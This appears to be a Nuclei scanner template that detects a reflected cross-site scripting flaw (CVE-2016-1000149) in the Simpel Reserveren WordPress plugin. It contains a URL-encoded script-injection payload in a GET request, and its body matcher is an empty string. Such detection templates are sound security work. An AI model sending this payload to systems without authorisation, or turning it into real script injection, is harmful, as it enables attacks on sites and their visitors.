id: CVE-2016-1000149 info: name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000149 cwe-id: CWE-79 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200